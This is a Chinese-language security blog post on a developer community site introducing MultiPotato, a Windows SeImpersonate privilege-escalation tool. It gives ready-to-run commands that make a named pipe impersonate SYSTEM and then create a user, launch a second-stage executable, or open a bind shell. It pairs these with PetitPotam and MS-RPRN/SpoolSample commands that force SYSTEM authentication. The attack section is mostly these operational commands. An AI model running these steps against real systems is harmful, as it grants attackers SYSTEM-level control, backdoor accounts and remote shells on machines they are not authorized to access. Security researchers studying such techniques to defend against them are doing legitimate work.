前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >SeImpersonate 权限提升

SeImpersonate 权限提升

原创
作者头像
Khan安全团队
发布2021-12-27 10:40:31
8960
发布2021-12-27 10:40:31
举报
文章被收录于专栏:Khan安全团队

MultiPotato

  • 它不包含任何用于武器化的系统身份验证触发器。相反,该代码可用于自行集成您最喜欢的触发器。
  • 它不仅CreateProcessWithTokenW用于生成新进程。相反,你可以选择CreateProcessWithTokenWCreateProcessAsUserWCreateUserBindShell

因此,该项目能够打开 NamedPipe 服务器,模拟连接到它的任何用户,然后执行上述选项之一。如果将来发布任何新的 SYSTEM auth 触发器,此工具仍可用于提升权限 - 在这种情况下,您只需要使用另一个 Pipe-Name。

例子:

  1. 带有修改过的 PetitPotam 触发器的 CreateUser:
代码语言:javascript
复制
c:\temp\MultiPotato> MultiPotato.exe -t CreateUser

默认情况下,您有 60 秒的值(可通过THEAD_TIMEOUT 更改)以让 SYSTEM 帐户或任何其他帐户进行身份验证。例如,这可以通过未修补的 MS-EFSRPC 函数来完成。默认情况下,MultiPotato 侦听管道名称\\.\pipe\pwned/pipe/srvsvc,该名称旨在与 MS-EFSRPC 结合使用。对于其他 SYSTEM auth 触发器,您可以通过-p参数调整此值。

代码语言:javascript
复制
c:\temp\MultiPotato> PetitPotamModified.exe localhost/pipe/pwned localhost

使用PetitPotam.py有效的低特权用户作为远程系统的触发器当然也是可能的。

  1. CreateProcessAsUserW 与 SpoolSample 触发器:
代码语言:javascript
复制
c:\temp\MultiPotato> MultiPotato.exe -t CreateProcessAsUserW -p "pwned\pipe\spoolss" -e "C:\temp\stage2.exe"

并通过触发它

代码语言:javascript
复制
c:\temp\MultiPotato>MS-RPRN.exe \\192.168.100.150 \\192.168.100.150/pipe/pwned

重要提示:在我对 MS-RPRN 的测试中,我不能使用 localhost 或 127.0.0.1 作为目标,这必须是网络 IP 地址或 FQDN。此外,需要启用打印机服务才能使其工作。

  1. BindShell 与 SpoolSample PipeName
代码语言:javascript
复制
c:\temp\MultiPotato> MultiPotato.exe -t BindShell -p "pwned\pipe\spoolss"

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。

如有侵权,请联系 cloudcommunity@tencent.com 删除。

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • MultiPotato
相关产品与服务
多因子身份认证
多因子身份认证(Multi-factor Authentication Service,MFAS)的目的是建立一个多层次的防御体系,通过结合两种或三种认证因子(基于记忆的/基于持有物的/基于生物特征的认证因子)验证访问者的身份,使系统或资源更加安全。攻击者即使破解单一因子(如口令、人脸),应用的安全依然可以得到保障。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档